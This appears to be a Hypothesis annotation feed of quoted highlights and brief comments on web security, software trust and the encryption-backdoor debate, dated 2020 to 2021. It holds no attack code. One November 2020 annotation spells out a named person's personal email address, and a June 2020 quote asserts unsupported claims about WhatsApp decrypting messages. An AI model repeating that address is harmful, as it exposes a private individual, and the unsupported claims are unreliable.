931 Matching Annotations
  1. Mar 2021
  2. Feb 2021
    1. I have a Content Security Policy!Oh, do you now.And did somebody tell you that this would prevent malicious code from sending data off to some dastardly domain? I hate to be the bearer of bad news, but the following four lines of code will glide right through even the strictest content security policy.
  3. Jan 2021
    1. I run a fairly ancient RedHat Enterprise 6 on my 32-bit test machine and if I need something requiring Gtk3 (such as a latest Firefox or Chrome), I just make a chroot and use debootstrap (from EPEL) to get me a Debian 9 userland for that program. Easy. No bizarre "app stores", no conflicting packages. Do people use Snap app-stores because they don't know how to use the chroot command? Or are they just lazy? If it is because they want the added security of a container, substitute chroot with lxc... Shouldn't be necessary though; if you avoid non-ethical software (i.e App-stores), you are very unlikely to need the added security.
    1. "in the Ubuntu 20.04 package base, the Chromium package is indeed empty and acting, without your consent, as a backdoor by connecting your computer to the Ubuntu Store. Applications in this store cannot be patched, or pinned. You can't audit them, hold them, modify them or even point snap to a different store. You've as much empowerment with this as if you were using proprietary software, i.e. none."
    1. At least one Zoom leaker has already been unmasked: a member of the New York State Assembly who apparently filmed his “self-view” while recording a dispute within the Democratic assembly conference over the renomination of the speaker. That may sound careless, but a feature developed by Zoom will allow future leakers to be exposed even without that sort of misstep.
    1. I remember reading Matt Bruenig when I was in college, and he was like, “Well, actually Social Security was the most effective pathway to bring people out of poverty.”  I wrote a story in 2017 called “Why Education Is Not the Key to a Good Income,” and it was looking at this growing body of research that showed it was not your level of education that determined your chances of rising economic mobility. It was these other factors—like what kind of industries were in your community, union density, some of it was marriage. 

      makes sense... the best way out of poverty isn't education... it's money.

  4. atomiks.github.io atomiks.github.io
    1. JSONP is a relic of the past and shouldn’t be used due to numerous limitations (e.g., being able to send GET requests only) and many security concerns (e.g., the server can respond with whatever JavaScript code it wants — not necessarily the one we expect — which then has access to everything in the context of the window, including localStorage and cookies).
    1. Many people are also very wary of PPAs because they can contain anything. While a PPA might say it contains “Music Player”, the owner of the PPA can put anything in it. The deb installed from a PPA has root on your system when installed, so can do anything - good or bad.
    1. As you already noticed, the extension does not go in an manipulate the hrefs/urls in the DOM itself. While it may seem scary to you that an extension may manipulate a URL you're navigating to in-flight, I think it's far scarier to imagine an extension reading and manipulating all of the HTML on all of the pages you go to (bank accounts, utilities, crypto, etc) in order to provide a smidgeon of privacy for the small % of times you happen to click a link with some UTM params.
    1. When you use target="_blank" with Links, it is recommended to always set rel="noopener" or rel="noreferrer" when linking to third party content. rel="noopener" prevents the new page from being able to access the window.opener property and ensures it runs in a separate process. Without this, the target page can potentially redirect your page to a malicious URL. rel="noreferrer" has the same effect, but also prevents the Referer header from being sent to the new page. ⚠️ Removing the referrer header will affect analytics.
  5. Dec 2020
    1. The only solution that I can see is to ensure that each user gets their own set of stores for each server-rendered page. We can achieve this with the context API, and expose the stores like so: <script> import { stores } from '@sapper/app'; const { page, preloading, session } = stores(); </script> Calling stores() outside component initialisation would be an error.

      Good solution.

    1. Just realised this doesn't actually work. If store is just something exported by the app, there's no way to prevent leakage. Instead, it needs to be tied to rendering, which means we need to use the context API. Sapper needs to provide a top level component that sets the store as context for the rest of the app. You would therefore only be able to access it during initialisation, which means you couldn't do it inside a setTimeout and get someone else's session by accident:
    1. This is an opportunity to fix a bug: if you're on a page that redirects to a login page if there's no user object, or otherwise preloads data specific to that user, then logging out won't automatically update the page — you could easily end up with a page like HOME ABOUT LOG IN ----------------------------------------------------------------------------------------- Secret, user-specific data that shouldn't be visible alongside a 'log in' button:
  6. Nov 2020
    1. to be listed on Mastodon’s official site, an instance has to agree to follow the Mastodon Server Covenant which lays out commitments to “actively moderat[e] against racism, sexism, homophobia and transphobia”, have daily backups, grant more than one person emergency access, and notify people three months in advance of potential closure. These indirect methods are meant to ensure that most people who encounter a platform have a safe experience, even without the advantages of centralization.

      Some of these baseline protections are certainly a good idea. The idea of advance notice of shut down and back ups are particularly valuable.

      I'd not know of the Mastodon Server Covenant before.

    1. @hypothes.is

      be careful : because you store the page title, when we make annotation on a personal website that stores personal informations in title, hypothes.is users can retieve those informations.

      for example, here I can see that jbarnett mail is jeankap@gmail.com.

      and i can see his mail's title.

      I will find a report option that would be better than this current annotation.

    1. This is addressing a security issue; and the associated threat model is "as an attacker, I know that you are going to do FROM ubuntu and then RUN apt-get update in your build, so I'm going to trick you into pulling an image that ​_pretents_​ to be the result of ubuntu + apt-get update so that next time you build, you will end up using my fake image as a cache, instead of the legit one." With that in mind, we can start thinking about an alternate solution that doesn't compromise security.
    1. If your Svelte components contain <style> tags, by default the compiler will add JavaScript that injects those styles into the page when the component is rendered. That's not ideal, because it adds weight to your JavaScript, prevents styles from being fetched in parallel with your code, and can even cause CSP violations. A better option is to extract the CSS into a separate file. Using the emitCss option as shown below would cause a virtual CSS file to be emitted for each Svelte component. The resulting file is then imported by the component, thus following the standard Webpack compilation flow.
    1. Now let me get back to your question. The FBI presents its conflict with Apple over locked phones as a case as of privacy versus security. Yes, smartphones carry a lot of personal data—photos, texts, email, and the like. But they also carry business and account information; keeping that secure is really important. The problem is that if you make it easier for law enforcement to access a locked device, you also make it easier for a bad actor—a criminal, a hacker, a determined nation-state—to do so as well. And that's why this is a security vs. security issue.

      The debate should not be framed as privacy-vs-security because when you make it easier for law enforcement to access a locked device, you also make it easier for bad actors to do so as well. Thus it is a security-vs-security issue.

    1. Barr makes the point that this is about “consumer cybersecurity” and not “nuclear launch codes.” This is true, but it ignores the huge amount of national security-related communications between those two poles. The same consumer communications and computing devices are used by our lawmakers, CEOs, legislators, law enforcement officers, nuclear power plant operators, election officials and so on. There’s no longer a difference between consumer tech and government tech—it’s all the same tech.

      The US government's defence for wanting to introduce backdoors into consumer encryption is that in doing so they would not be weakening the encryption for, say, nuclear launch codes.

      Schneier holds that this distinction between government and consumer tech no longer exists. Weakening consumer tech amounts to weakening government tech. Therefore it's not worth doing.

  7. Oct 2020
    1. Australia's Cyber Security Strategy: $1.66 billion dollar cyber security package = AFP gets $88 million; $66 million to critical infrastructure organisations to assess their networks for vulnerabilities; ASD $1.35 billion (over a decade) to recruit 500 officers.

      Reasons Dutton gives for package:

      • child exploitation
      • criminals scamming, ransomware
      • foreign governments taking health data and potential attacks to critical infrastructure

      What is defined as critical infrastructure is expanded and subject to obligations to improve their defences.

      Supporting cyber resilience of SMEs through information, training, and services to make them more secure.

    1. Could you please explain why it is a vulnerability for an attacker to know the user names on a system? Currently External Identity Providers are wildly popular, meaning that user names are personal emails.My amazon account is my email address, my Azure account is my email address and both sites manage highly valuable information that could take a whole company out of business... and yet, they show no concern on hiding user names...

      Good question: Why do the big players like Azure not seem to worry? Microsoft, Amazon, Google, etc. too probably. In fact, any email provider. So once someone knows your email address, you are (more) vulnerable to someone trying to hack your account. Makes me wonder if the severity of this problem is overrated.

      Irony: He (using his full real name) posts:

      1. Information about which account ("my Azure account is my email address"), and
      2. How high-value of a target he would be ("both sites manage highly valuable information that could take a whole company out of business...")

      thus making himself more of a target. (I hope he does not get targetted though.)

    2. That is certainly a good use-case. One thing you can do is to require something other than a user-chosen string as a username, something like an email address, which should be unique. Another thing you could do, and I admit this is not user-friendly at all, to let them sign up with that user name, but send the user an email letting them know that the username is already used. It still indicates a valid username, but adds a lot of overhead to the process of enumeration.
  8. Sep 2020
  9. Aug 2020
  10. Jul 2020
    1. While stylesheets can be reworked relatively easily with AMP by inlining the CSS, the same is not true for JavaScript. The tag 'script' is disallowed except in specific forms. In general, scripts in AMP are only allowed if they follow two major requirements: All JavaScript must be asynchronous (i.e., include the async attribute in the script tag). The JavaScript is for the AMP library and for any AMP components on the page. This effectively rules out the use of all user-generated/third-party JavaScript in AMP except as noted below.
    1. If you have worked with emails before, the idea of placing a script into an email may set off alarm bells in your head! Rest assured, email providers who support AMP emails enforce fierce security checks that only allow vetted AMP scripts to run in their clients. This enables dynamic and interactive features to run directly in the recipients mailboxes with no security vulnerabilities! Read more about the required markup for AMP Emails here.
    1. It's possible for a document to match more than one match statement. In the case where multiple allow expressions match a request, the access is allowed if any of the conditions is true

      overlapping match statements

  11. Jun 2020
    1. For a political body that devotes a lot of attention to national security, the implicit threat of revoking Section 230 protection from organizations that implement end-to-end encryption is both troubling and confusing. Signal is recommended by the United States military. It is routinely used by senators and their staff. American allies in the EU Commission are Signal users too. End-to-end encryption is fundamental to the safety, security, and privacy of conversations worldwide.
    2. The EARN IT act turns Section 230 protection into a hypocritical bargaining chip. At a high level, what the bill proposes is a system where companies have to earn Section 230 protection by following a set of designed-by-committee “best practices” that are extraordinarily unlikely to allow end-to-end encryption. Anyone who doesn’t comply with these recommendations will lose their Section 230 protection.
    1. As uber-secure messaging platform Signal has warned, “Signal is recommended by the United States military. It is routinely used by senators and their staff. American allies in the EU Commission are Signal users too. End-to-end encryption is fundamental to the safety, security, and privacy of conversations worldwide.”
    2. On April 24, the U.S. National Security Agency published an advisory document on the security of popular messaging and video conferencing platforms. The NSA document “provides a snapshot of best practices,” it says, “coordinated with the Department of Homeland Security.” The NSA goes on to say that it “provides simple, actionable, considerations for individual government users—allowing its workforce to operate remotely using personal devices when deemed to be in the best interests of the health and welfare of its workforce and the nation.” Again somewhat awkwardly, the NSA awarded top marks to WhatsApp, Wickr and Signal, the three platforms that are the strongest advocates of end-to-end message encryption. Just to emphasize the point, the first criteria against which NSA marked the various platforms was, you guessed it, end-to-end encryption.
    3. Once the platforms introduce backdoors, those arguing against such a move say, bad guys will inevitably steal the keys. Lawmakers have been clever. No mention of backdoors at all in the proposed legislation or the need to break encryption. If you transmit illegal or dangerous content, they argue, you will be held responsible. You decide how to do that. Clearly there are no options to some form of backdoor.
    4. While this debate has been raging for a year, the current “EARN-IT’ bill working its way through the U.S. legislative process is the biggest test yet for the survival of end-to-end encryption in its current form. In short, this would enforce best practices on the industry to “prevent, reduce and respond to” illicit material. There is no way they can do that without breaking their own encryption. QED.
    1. The issue, though—and it’s a big one, is that the SMS infrastructure is inherently insecure, lending itself to so-called “man-in-the-middle attacks.” Messages run through network data centres, everything can be seen—security is basic at best, and you are vulnerable to local carrier interception when travelling.
    1. On the encryption front, HRW echoes others that have argued vehemently against the proposals—that weakened encryption will “endanger all people who rely on encryption for safety and security—once one government enjoys special access, so too will rights-abusing governments and criminal hackers.” Universal access to encryption “enables everyone, from children attending school online to journalists and whistleblowers, to exercise their rights without fear of retribution.”
    1. Just like Blackberry, WhatsApp has claimed that they are end to end encrypted but in fact that is not trueWhatsApp (and Blackberry) decrypt all your texts on their servers and they can read everything you say to anyone and everyoneThey (and Blackberry) then re-encrypt your messages, to send them to the recipient, so that your messages look like they were encrypted the entire time, when in fact they were not
    1. If the EU is set to mandate encryption backdoors to enable law enforcement to pursue bad actors on social media, and at the same time intends to continue to pursue the platforms for alleged bad practices, then entrusting their diplomatic comms to those platforms, while forcing them to have the tools in place to break encryption as needed would seem a bad idea.
    2. First, the recognition that sensitive information needs to be transmitted securely over instant messaging platforms plays into the hands of the privacy advocates who are against backdoors in the end-to-end encryption used on WhatsApp, Signal, Wickr, iMessage and others. The core argument from the privacy lobby is that a backdoor will almost certainly be exploited by bad actors. Clearly, the EU (and others) would not risk their own comms with such a vulnerability.
    1. Security agencies use anti-terror efforts to justify planting backdoors. The problem is that such backdoors can also be used by criminals and authoritarian governments. No wonder dictators seem to love WhatsApp: its lack of security allows them to spy on their own people, so WhatsApp continues to be freely available in places like Russia or Iran, where Telegram is banned by the authorities
  12. May 2020
    1. There is a serious weakness in DSA (which extends to ECDSA) that has been exploited in several real world systems (including Android Bitcoin wallets and the PS3); the signature algorithm relies on quality randomness (bits that are indistinguishable from random); once the PRNG enters a predictable state, signatures may leak private keys. Systems that use ECDSA must be aware of this issue, and pay particular attention to their PRNG.
    1. GanttLab does not store any information: everything runs in your browser. Under the hood, we use localForage to remember the state of the application, which enables great user experience without any security risk. Secured API requests are initiated in your computer's browser, hence coming straight from your local network. Those requests are going directly to the data source you selected (your GitHub or GitLab account) without ever transiting through any other server.
    1. GanttLab does not store any information: everything runs in your browser. Under the hood, we use localForage to remember the state of the application, which enables great user experience without any security risk. Secured API requests are initiated in your computer's browser, hence coming straight from your local network. Those requests are going directly to the data source you selected (your GitHub or GitLab account) without ever transiting through any other server.
    1. Image consumers can enable DCT to ensure that images they use were signed. If a consumer enables DCT, they can only pull, run, or build with trusted images. Enabling DCT is a bit like applying a “filter” to your registry. Consumers “see” only signed image tags and the less desirable, unsigned image tags are “invisible” to them.
    1. In terms of their border dispute, India and China are struggling with what game theorists refer to as a “commitment problem.” Meaning A commitment problem arises when two states, who would be better off in the present if they consented to a mutually beneficial agreement, are unable to resolve their disputes due to different expectations of future strengths, and a consequent inability to commit to future bargaining power or a division of benefits.
  13. developer.chrome.com developer.chrome.com
    1. If a user clicks on that button, the onclick script will not execute. This is because the script did not immediately execute and code not interpreted until the click event occurs is not considered part of the content script, so the CSP of the page (not of the extension) restricts its behavior. And since that CSP does not specify unsafe-inline, the inline event handler is blocked.
    1. I appreciate the vigilance, but it would be even better to actually publish a technical reasoning for why do you folks believe Firefox is above the device owner, and the root user, and why there should be no possibility through any means and configuration protections to enable users to run their own code in the release version of Firefox.
    1. Mozilla does not permit extensions distributed through https://addons.mozilla.org/ to load external scripts. Mozilla does allow extensions to be externally distributed, but https://addons.mozilla.org/ is how most people discover extensions. The are still concerns: Google and Microsoft do not grant permission for others to distribute their "widget" scripts. Google's and Microsoft's "widget" scripts are minified. This prevents Mozilla's reviewers from being able to easily evaluate the code that is being distributed. Mozilla can reject an extension for this. Even if an extension author self-distributes, Mozilla can request the source code for the extension and halt its distribution for the same reason.

      Maybe not technically a catch-22/chicken-and-egg problem, but what is a better name for this logical/dependency problem?